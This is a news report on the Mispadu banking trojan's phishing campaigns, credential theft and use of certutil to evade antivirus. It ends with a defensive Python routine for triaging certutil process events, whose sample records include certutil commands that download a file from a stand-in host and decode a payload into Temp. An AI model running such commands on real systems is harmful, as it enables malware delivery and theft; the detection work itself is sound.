Mispadu banking trojan targets Latin America: over 90,000 credentials stolen


One trojan - from one email to loss of funds.

Security company Metabase Q reports that the operators of the Mispadu banking Trojan are running several spam campaigns in Bolivia, Chile, Mexico, Peru, Portugal and other countries to steal credentials and deliver additional malware.

According to the researchers, the current campaign began in August 2022. The Mispadu Trojan (also known as URSA) was first documented by ESET in November 2019; at that time the researchers already noted its ability to steal funds and credentials, take screenshots and log keystrokes.

One of the operators' main strategies for spreading Mispadu is:
compromising vulnerable WordPress sites;
turning them into command and control (C2) servers;
distributing the malware from those C2 servers;
filtering out visitors from countries the operators do not want to infect.

The attack chain starts with emails urging the recipient to open a fake overdue-account notice. When the victim opens the HTML attachment, it checks that the file was opened on a desktop computer and then redirects the victim to a remote server to download a malicious archive.

The RAR or ZIP archive contains two fake digital certificates: one is the Mispadu malware itself and the other is an AutoIT installer. The legitimate Windows command-line utility certutil is then used to decode and run the Trojan.

Mispadu can collect a list of installed antivirus products, steal credentials from Google Chrome and Microsoft Outlook, and download additional malware, including an obfuscated VBS dropper designed to fetch payloads from a hard-coded domain. The payloads delivered are:

a .NET-based remote access tool that can execute commands received from a C2 server;
a loader written in Rust that runs a PowerShell loader to run files directly from memory.

In addition, the malware displays overlay screens on top of banking pages to capture online banking credentials and other sensitive information.

Metabase Q noted that the use of certutil allowed Mispadu to evade detection by a wide range of antivirus products and to collect over 90,000 online banking credentials from more than 17,500 unique websites.
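Because the decode step runs through a signed Windows binary, file scanning alone misses it, but process-creation telemetry does not have to. The Python triage routine below is an added example, not code from Metabase Q or from the article: it runs over constructed process-creation records in an assumed "parent|image|command_line" format, treats AutoIt3.exe as an assumed image name for the AutoIT stage, and rates certutil launches by switch, parent process and path.

```python
import re
import shlex

# Switches that turn certutil into a decoder or downloader rather than a
# certificate tool; Mispadu's chain relies on -decode.
SUSPICIOUS_FLAGS = {"-decode", "-decodehex", "-encode", "-urlcache"}
# Script/automation hosts that should not spawn certutil (AutoIt3.exe is an
# assumed image name standing in for the AutoIT stage described above).
SCRIPT_HOSTS = {"autoit3.exe", "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# Directory names an unprivileged user can write to, as they appear in paths.
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|public)\\", re.IGNORECASE)
# Constructed process-creation records (not real telemetry), formatted as
# "parent_image|image|command_line".
SAMPLE_EVENTS = [
    r"C:\Windows\explorer.exe|C:\Windows\System32\certutil.exe|certutil -verify cert.cer",
    r"C:\Users\u\AppData\Local\Temp\AutoIt3.exe|C:\Windows\System32\certutil.exe|certutil -decode C:\Users\u\AppData\Local\Temp\cert.cer C:\Users\u\AppData\Local\Temp\update.exe",
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil.exe /urlcache /split /f http://example.invalid/x.cer x.cer",
    r"C:\Windows\System32\services.exe|C:\Windows\System32\certutil.exe|certutil -addstore Root corp.cer",
]

def certutil_switches(cmdline):
    """Return (switches, args); switches are lower-cased with '/x' folded to '-x'."""
    args = shlex.split(cmdline, posix=False)[1:]
    switches = {"-" + a[1:].lower() for a in args if a and a[0] in "-/"}
    return switches, args

def triage_event(record):
    """Return (severity, reason) for one record, or None if it looks benign."""
    parent, image, cmdline = record.split("|", 2)
    if not image.lower().endswith("certutil.exe"):
        return None
    switches, args = certutil_switches(cmdline)
    hit = sorted(switches & SUSPICIOUS_FLAGS)
    if not hit:
        return None
    parent_name = parent.rsplit("\\", 1)[-1].lower()
    if parent_name in SCRIPT_HOSTS:
        return "high", f"{hit} launched by script host {parent_name}"
    if any(USER_WRITABLE.search(a) for a in args):
        return "high", f"{hit} touching a user-writable path"
    return "medium", f"{hit} used by {parent_name}"

def triage_events(records):
    """Map record index -> (severity, reason) for every record that fires."""
    verdicts = ((i, triage_event(r)) for i, r in enumerate(records))
    return {i: v for i, v in verdicts if v}

if __name__ == "__main__":
    for i, (sev, why) in triage_events(SAMPLE_EVENTS).items():
        print(f"event {i}: {sev} - {why}")
```

Only the AutoIT-spawned decode and the cmd.exe download fire; the certificate verification and store update are left alone, which is the distinction that keeps such a rule usable on real endpoints.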